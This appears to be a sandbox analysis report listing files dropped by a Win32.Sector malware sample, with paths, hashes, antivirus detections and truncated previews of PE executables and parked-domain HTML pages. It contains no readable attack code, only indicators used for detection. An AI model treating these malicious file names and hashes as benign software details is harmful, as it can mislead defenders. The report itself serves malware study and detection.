                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):66561
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973724333428112
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:7uSWEpo6q15U+q3Az3uuH2t2n91OwQKDzuJd6pZtwpGbHw6mNQv:7FWEi6q3FMO3VWon91XeJUftw0bMNQv
                                                                                                                                                                                                                                                                                          MD5:1055DB83CB3F76F605B20449C129F8D6
                                                                                                                                                                                                                                                                                          SHA1:2DAF7C651F37AD51007A97AA20D76D80325B6A64
                                                                                                                                                                                                                                                                                          SHA-256:24310ADF8F28520EC8DBF0EF10DD1AEE64B09934335461525AEFD22C57BD2FA9
                                                                                                                                                                                                                                                                                          SHA-512:0DBE6A4F02CD2FD6741A331F76DF510B9D83BDC7B515B628597E67571FB9CACA5AC59CB36D7CB4C159F849582EF3D40309099E874066E1BAC70A494989528F64
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................+. ................................................................[.n..~..$.....E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winfuyf.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.647490316801236
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFxWOLMqUtmtE9VCzBAEcBb3M7ioaxyi6CV/+MTf992wP:MWOZUh9VMB6wi1yi7Pl928
                                                                                                                                                                                                                                                                                          MD5:D3B408D47BFFD12C3DF268B2B98DA29A
                                                                                                                                                                                                                                                                                          SHA1:3A449FC66630668D14A46747BB2BA4F26DC15984
                                                                                                                                                                                                                                                                                          SHA-256:4832BC565030814F0793B359C6D9F18FB1A3338270527D560B4EE6922741FDBE
                                                                                                                                                                                                                                                                                          SHA-512:E51517A662652404F1E0F5FB4471D731835E59D29E72BBA8E80F4E6ADBA3DC53DC9E5A16D1F58DD6B955BE3393A8426A61E697074C8E3EA2E7ED211F8911D470
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIzMC43NzU0OjAwOGExMDFkODQxMDZhOWI3NGExODQwNmE4YWY2MGIzMjgzNDQwY2QxNWNhMDQzOThkZDc4N2YxNzY4OTZhODQ6NjcxMjNiZTZiZDRmNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JlNmJkNGFmfHx8MTcyOTI0ODIz

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winglraj.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (357)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.659269368304425
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFioMqUtmtE9VCqbwlfdo+M7ioaxyi6CVtmMTf992wP:wUh9VTyCi1yi7xl928
                                                                                                                                                                                                                                                                                          MD5:68C09FCE76F96240B19A8299FB87B9C0
                                                                                                                                                                                                                                                                                          SHA1:3D708084FC92577CDD5667EF9B15CD01B6B4A2FE
                                                                                                                                                                                                                                                                                          SHA-256:0F62DF44E711957D0A93124FA598247E0120123F05F77CDD475C6A0EC875C4CB
                                                                                                                                                                                                                                                                                          SHA-512:8EE7E27C4823BD42C6B339E4EDE8CE707F0DD4675B206D907A73A98AA35D72D415D20B79B768C0AC138C618FCDD64F383668245E76493F3286493F0AA6361BAD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODExNS4wODE1OjM4YTA2MGJmNWI3NzE1NmQ4YjZiYjA0Yzk5ZTNkOGE4ZGQzZGYyM2RhMGRmOGRmMjY0MTY1MjYxNTdkNGVhNTc6NjcxMjNiNzMxM2U4NQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I3MzEzZTU2fHx8MTcyOTI0ODEx

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winguwxpv.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.644051256915002
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFReEruMMqUtmtE9VCBsGiUcByA3M7ioaxyi6CVhMTf992wP:vWhUh9V+sGawi1yi74l928
                                                                                                                                                                                                                                                                                          MD5:1E2C672B9B8C8E1BAD2851901B6DBB1A
                                                                                                                                                                                                                                                                                          SHA1:4542C18E1835BC4C130446382B3F1AF519B2F085
                                                                                                                                                                                                                                                                                          SHA-256:62FBBD0D473B2EA7BEDC5E5E821188104ED1E616AD8D5F5181AD5E4AEBFF69F8
                                                                                                                                                                                                                                                                                          SHA-512:40660D685145301F620AE9D18935814847EB799BB6062FDC18B1E59B505A8CAADFAFDE3C10EEA6C948728B1D790F794701BCA9451FB444052755C5FB9D478CA0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMxNy4zNDU6M2JlMWZmZmE1ZDRiN2VlN2M2MzhiZmNhYmM5MTE1MGUyM2FmOGY3YTA2ZTU5MDlkNWQ4ZmY2ZTgzMzIzOGI4Nzo2NzEyM2MzZDU0M2Mx';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MzZDU0Mzg2fHx8MTcyOTI0ODMxNy41

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\wingyqbqr.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.652220920703378
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFEvXf42MqUtmtE9VC0b48cB+3M7ioaxyi6CVx7MTf992wP:HvHUh9V1b4vPi1yi7xSl928
                                                                                                                                                                                                                                                                                          MD5:FF267AD5B1CF16F796230E372A4C6072
                                                                                                                                                                                                                                                                                          SHA1:747EA4B418EAA4C95EDFF68D677CE2186A7131F6
                                                                                                                                                                                                                                                                                          SHA-256:C4F9A9A10CA0C68FC0946A51DB276E5830B88F47B8ADD0314201E26E0FC9B4C8
                                                                                                                                                                                                                                                                                          SHA-512:46F30B43CF91FC5BDF9D4427D02ABB1CAA4E87B0598F5C25EA94CE4384652D9AB43D903C11AAC51AA4203AE77D05BF459ABDA6831D005E2DD1F2144EF79B0E0E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI0OC43MTAxOjNiY2RlMDJjNzM0ZGFhODEwNGJjMGEwNWY1NzlkOGFhM2QzYzExMzNjNjc1YWJjNzdlMWQwNDBjZWM4MzNhNDA6NjcxMjNiZjhhZDVhNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JmOGFkNTc3fHx8MTcyOTI0ODI0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winidlrll.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.642814793302475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFfHZtDvMqUtmtE9VCvcBr3M7ioaxyi6CV8LMTf992wP:E5tZUh9VrIi1yi7fl928
                                                                                                                                                                                                                                                                                          MD5:45D16A698221910A39461A48CDAEC87D
                                                                                                                                                                                                                                                                                          SHA1:5406503B56A5097BD1CAC3BC00DBAF68C62A7578
                                                                                                                                                                                                                                                                                          SHA-256:A027A4D5C82D9E63AEAE47F3C89A4034B38318FC5BC67253929C582D821B39D1
                                                                                                                                                                                                                                                                                          SHA-512:A4BF15ED1DDD93A277D03C015460E214716DB9120F3177B33A2306FD6CE11927ED2A1A38B8F2FAAF5DEF1CB5B97081F15E753912DB0CEAED1CEEA54599BF234E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMyMy4yNTI5OjZkOGQ2YTE0ZGI3YjIxMjY3ODMwMmMyYTA0ZjllYjdhMjA0OTM0Yjg0ODllYjU4YzE1ZjUzOTZhMzViZTVlODk6NjcxMjNjNDMzZGJmZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2M0MzNkYmQzfHx8MTcyOTI0ODMy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winiwxwcq.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64433659322831
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFDGIccMqUtmtE9VCmBN/cBS83M7ioaxyi6CV0MTf992wP:DI3Uh9VHUQri1yi7Vl928
                                                                                                                                                                                                                                                                                          MD5:264AAF69C1EEAA5505B02190C58A09B4
                                                                                                                                                                                                                                                                                          SHA1:E718678F33C184A3F1926CEA56F183BA0C1BC63D
                                                                                                                                                                                                                                                                                          SHA-256:0D085ABEAE0AE7F4016B73281427C9AA4319F0062B60FE52B2C0D12A1C0B015A
                                                                                                                                                                                                                                                                                          SHA-512:FFD9B47675F3C50843983FDF4F04D45172A961FBD1C7DFBEEC56A78A1B8D1B891D50714B02567048E0CBC626ADC7FD883660AC924C3426B73D0ECAF8DF078584
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE2Mi4zNTMzOjEzOThmMGYyYmVlN2FkZTU1MTA1ZTRhZTczMWU5NDJjYjc4Y2M5ZWEzZGI5MWM5YzA4NjU5ZDc3ZTNkOGI3OWI6NjcxMjNiYTI1NjQyNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JhMjU2M2Y0fHx8MTcyOTI0ODE2

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winixhla.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6462342904136875
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFUcMqUtmtE9VCOHUcBDFrf3M7ioaxyi6CVCMTf992wP:n4Uh9VRhFyi1yi77l928
                                                                                                                                                                                                                                                                                          MD5:D1B6484758409A47896D5C73C3AE6982
                                                                                                                                                                                                                                                                                          SHA1:F8B551205B07CBD6F3C8359C9FCFDB0714D302D9
                                                                                                                                                                                                                                                                                          SHA-256:F1C3F67F7695BCB049A473B62E19555C03B0480D961590B22C1E3A579EACE4E6
                                                                                                                                                                                                                                                                                          SHA-512:D53760ECCAE162F040EE2BE9A2F85D7B7FF5B0459E49FE3F77C99F68F92E300DE7979F59A7EA302483386EB127CC526243B456D67F76B1618D0A1A75662896A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIzNi43NzkxOjEyN2ZjZDE0N2Y0MzViZjgwMmQ5NmE0ZmNlY2Y5MWUyYWExMGNhMDg3MTZmY2JhMjM3YjE0ODQxODczNmZkYTA6NjcxMjNiZWNiZTM3MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JlY2JlMzI2fHx8MTcyOTI0ODIz

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winkvnav.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):66561
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976426841109004
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:uUvcBy8G6onrmCd/d7shmXfOaqH41KKsVMI0PawTnkWqkdu:uSHDrmg/mhiWaT4Vf0iwgWq5
                                                                                                                                                                                                                                                                                          MD5:A6D19E233BF430D143798D750270FCEA
                                                                                                                                                                                                                                                                                          SHA1:D0020645481058402C1420A0DEA88F7779AD0EBF
                                                                                                                                                                                                                                                                                          SHA-256:30C9ECE72D9F93A974B074BF256702E6C8168A17E2621F369A5BD54533AAA1C8
                                                                                                                                                                                                                                                                                          SHA-512:C28BC7803F8E0C8AAFF58347D425CA0423FE208353A1D7A0F3A5C6DFFE413E1DE0712C99B3CB911EFBB04336DB9F5377BF942E795B36643E35402553F12B602C
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................`. ................................................................_.n..~..F...S......E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winlakaf.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.652806959180236
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFnxNMqUtmtE9VCO91VcBvQ43M7ioaxyi6CVXdUSMTf992wP:UxvUh9Vt8JQXi1yi7tULl928
                                                                                                                                                                                                                                                                                          MD5:9E3E66E553497304FA0FEFBE32756751
                                                                                                                                                                                                                                                                                          SHA1:17F4B7D65961DA0D89045353B7A2DBA63197F5B1
                                                                                                                                                                                                                                                                                          SHA-256:D87446362EF0A78B8080E1F3ED684F0893DE60FD548ABC4FAF921CE68B20FEC8
                                                                                                                                                                                                                                                                                          SHA-512:7B190DF81E07CE307B69091BA87690D0BF79EDD404308417B4AB3D83E58B2138DDB34EAEBB6664E42E70E4645E83473076A827B697D83F9090C774AF8F100895
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEwOS4wMTYxOjZlNDZhZjI5ZGIzMDQ2MGRjYTJkNGEzNWY2YzY5YzMxOGQ5YTNlZmEzZDM1YjZlMmE1NzRhNzIzNWM1ZWQ1Yzg6NjcxMjNiNmQwM2VjNw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I2ZDAzZTk1fHx8MTcyOTI0ODEw

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winlggu.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.631827034956459
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFlOIcwMqUtmtE9VCMcBop3M7ioaxyi6CV/MTf992wP:wvUh9VYGki1yi72l928
                                                                                                                                                                                                                                                                                          MD5:FB3750B62C54D340B231C470C0B2BA2A
                                                                                                                                                                                                                                                                                          SHA1:D6BF069E9F5EF301CA4E667C2C6BE46B031695B6
                                                                                                                                                                                                                                                                                          SHA-256:25F81703247C23D8BF4DF809A0C7B651AFB6567C029BA7E0D7FFBA4E3E3B8CE6
                                                                                                                                                                                                                                                                                          SHA-512:D770D94C3AF260985E5FBC3C04E7E4E5B18FBD0E5C3722AA4BD6CB8DDEDC38C6CED27D71F0F40A0E54A5FC39EA01D21AFA9DFB63F62A2C43F9951027FBD06D94
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI4Ni45MTg4OjdkY2NhNTY1NmM4NDIwNzE5OGRhMGNjMjM4MDFhMmJhYWM3MjY5MDdmMmIwMDcyOWNhNjMwMDRjZDlhNDRjNzk6NjcxMjNjMWVlMDUzNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MxZWUwNTA1fHx8MTcyOTI0ODI4

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winmxfy.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):66561
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.975053528807288
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:J99UU79L6NPegIlaIkjS1vv3crVlx+DXCM6bJBZ0t2W6y:J99UEd6xoyjS5oJ+rnybZNW6y
                                                                                                                                                                                                                                                                                          MD5:F0338C25E365C6651983230ADC39A294
                                                                                                                                                                                                                                                                                          SHA1:A57DDCD742ACD037EC923086CA7E56D907E10EC4
                                                                                                                                                                                                                                                                                          SHA-256:5DB0A48FF3630250DA0EFE28945827F86E7B31C8B6EFF686D868EC69D6EB73F1
                                                                                                                                                                                                                                                                                          SHA-512:90EF222B791FFE1C04BAEC4167C21657680350CB97DABF9BFED725A8251A126BCEA72402436194FDB6085C079C41C56FECA6909569C067DED2E47E4954733948
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................m. ................................................................^.n..~..A...R..Ei....,c....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winpderh.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.649941046192796
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFl2tMqUtmtE9VC9ucBZp3M7ioaxyi6CVtCQ+nMTf992wP:rUh9V6xIi1yi7tZl928
                                                                                                                                                                                                                                                                                          MD5:D029DFE4D3A210F3F1CD7C8DA0313E9D
